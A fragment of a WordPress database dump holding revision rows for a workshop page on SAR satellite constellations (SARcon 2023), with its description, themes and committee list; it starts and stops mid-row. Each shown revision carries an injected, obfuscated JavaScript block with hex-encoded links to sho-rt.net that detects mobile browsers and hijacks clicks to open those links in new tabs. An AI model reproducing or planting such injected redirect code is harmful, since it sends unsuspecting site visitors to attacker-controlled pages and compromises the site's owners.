_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 17:17:19','2022-10-13 17:17:19','',2736,'https://gsw2023.com/?p=2755',0,'revision','',0),
(2756,1,'2022-10-13 17:18:11','2022-10-13 17:18:11','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"10px 20px 20px 20px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 17:18:11','2022-10-13 17:18:11','',2736,'https://gsw2023.com/?p=2756',0,'revision','',0),
(2757,1,'2022-10-13 17:18:46','2022-10-13 17:18:46','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"25px 20px 20px 20px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x